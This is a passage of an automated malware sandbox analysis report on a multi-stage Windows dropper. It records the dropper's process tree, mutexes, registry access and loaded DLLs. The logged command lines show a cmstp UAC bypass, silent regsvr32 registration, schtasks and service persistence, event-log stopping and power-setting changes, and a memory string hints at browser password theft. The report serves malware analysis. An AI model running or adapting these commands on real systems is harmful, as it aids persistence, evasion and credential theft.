                          Source: NzL6O1Q[1].exe.5.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: NzL6O1Q.exe.5.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: NzL6O1Q.exe.5.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: NzL6O1Q.exe.20.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: NzL6O1Q.exe.20.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: NzL6O1Q.exe0.20.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: NzL6O1Q.exe0.20.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: NzL6O1Q.exe.5.dr, Helper.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: NzL6O1Q.exe.5.dr, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: NzL6O1Q.exe.20.dr, Helper.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: NzL6O1Q.exe.20.dr, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: NzL6O1Q.exe0.20.dr, Helper.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: NzL6O1Q.exe0.20.dr, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: NzL6O1Q[1].exe.5.dr, Helper.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: NzL6O1Q[1].exe.5.dr, Helper.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.mine.winEXE@83/1075@0/13
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9LbUK15[1].exeJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeMutant created: \Sessions\1\BaseNamedObjects\456
                          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6220:120:WilError_03
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
                          Source: C:\Windows\System32\svchost.exeMutant created: \BaseNamedObjects\Global\vohvtbtkkqqpcgvy
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5124:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5476:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5916:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3992:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2196:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6184:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:396:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3604:120:WilError_03
                          Source: C:\Windows\SysWOW64\cmstp.exeMutant created: \Sessions\1\BaseNamedObjects\Connection Manager Profile Installer Mutex
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeMutant created: \Sessions\1\BaseNamedObjects\zqSMCisGkvTtWK5F
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                          Source: e44fda3216.exe, 0000000B.00000003.2388649203.0000000005345000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388271867.0000000005379000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: file.exeReversingLabs: Detection: 57%
                          Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: e44fda3216.exeString found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696333830); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856); user_pref("app.update.lastUpdateTime.xpi-signatur
                          Source: e44fda3216.exeString found in binary or memory: p.update.lastUpdateTime.recipe-client-addon-run", 1696333830); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856); user_pref("app.update.lastUpdateTime.xpi-signature-v
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe "C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess created: C:\Windows\SysWOW64\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Users\user\Sys.inf
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe"
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe "C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe "C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeProcess created: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp "C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp" /SL5="$30528,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe"
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpProcess created: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe "C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeProcess created: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp "C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp" /SL5="$20532,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv"
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv"
                          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }"
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe "C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\pcqxl.exe C:\Users\user\AppData\Local\Temp\pcqxl.exe
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\NzL6O1Q.exe C:\Users\user\AppData\Roaming\NzL6O1Q.exe
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "RNRFMTFS"
                          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "RNRFMTFS" binpath= "C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe" start= "auto"
                          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "RNRFMTFS"
                          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\NzL6O1Q.exe "C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe "C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\NzL6O1Q.exe "C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe "C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe "C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe "C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe "C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe "C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess created: C:\Windows\SysWOW64\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Users\user\Sys.infJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeProcess created: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp "C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp" /SL5="$30528,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe"
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpProcess created: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe "C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeProcess created: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp "C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp" /SL5="$20532,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv"
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv"
                          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }"
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "RNRFMTFS"
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "RNRFMTFS" binpath= "C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe" start= "auto"
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "RNRFMTFS"
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
